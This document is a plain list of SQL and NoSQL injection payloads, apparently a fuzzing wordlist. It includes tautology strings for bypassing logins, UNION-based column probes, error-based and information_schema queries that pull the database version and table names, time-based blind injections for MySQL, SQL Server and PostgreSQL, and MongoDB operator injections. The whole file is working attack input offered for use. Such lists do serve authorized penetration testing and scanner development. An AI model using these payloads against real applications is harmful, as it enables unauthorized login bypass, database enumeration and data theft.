# SQL Injection Payloads
'
\"
' OR '1'='1
\" OR \"1\"=\"1
' OR 1=1--
' OR 1=1#
admin'--
' OR 'x'='x
' OR 1=1 LIMIT 1--
1' ORDER BY 1--
1' ORDER BY 100--
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
1' UNION SELECT 1,2,3--
1' UNION ALL SELECT 1,2,3,4,5--
' AND 1=CONVERT(int, (SELECT @@version))--
1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version)))--
1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
-1' UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--
'; WAITFOR DELAY '0:0:5'--
1'; SELECT SLEEP(5)--
1' OR SLEEP(5)--
1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
'; SELECT pg_sleep(5);--
1' AND 1=1--
1' AND 1=2--
admin' OR '1'='1
admin') OR ('1'='1
true, $where: '1 == 1'
{$gt: ''}
{$ne: ''}
{$regex: '.*'}

